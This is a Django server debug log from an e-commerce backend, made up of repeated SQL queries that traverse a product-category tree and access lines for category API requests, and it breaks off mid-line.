2019-12-16 06:49:17,705 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:49:17,707 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:49:17,710 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:49:17,713 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:49:17,715 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:49:17,717 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:49:17,720 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:49:17,722 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:49:17,726 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:49:17,728 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:49:17,730 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:49:17,732 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:49:17,734 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:49:17,737 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:49:17,740 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:49:17,742 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:49:17,744 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:49:17,747 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:49:17,749 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:49:17] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 06:50:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-16 06:50:25,526 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 06:50:25,533 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 06:50:25,537 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 06:50:25,539 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:50:25,542 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 06:50:25,544 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 06:50:25,547 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 06:50:25,549 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 06:50:25,551 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 06:50:25,555 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 06:50:25,561 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 06:50:25,563 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 06:50:25,565 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 06:50:25,567 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 06:50:25,568 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 06:50:25,575 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 06:50:25,577 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 06:50:25,580 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 06:50:25,583 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) [16/Dec/2019 06:50:25] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-16 06:50:25,585 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 06:50:25,588 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 06:50:25,591 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 06:50:25,593 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 06:50:25,596 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 06:50:25,598 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 06:50:25,600 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 06:50:25,602 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 06:50:25,606 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 06:50:25,608 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 06:50:25,610 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 06:50:25,612 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 06:50:25,615 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 06:50:25,618 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 06:50:25,620 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 06:50:25,622 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 06:50:25,624 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 06:50:25,627 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 06:50:25,630 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 06:50:25,632 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 06:50:25,635 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 06:50:25,637 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 06:50:25,639 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 06:50:25,641 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 06:50:25,644 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 06:50:25,646 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 06:50:25,648 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 06:50:25,651 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 06:50:25,653 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 06:50:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 06:51:36] "GET / 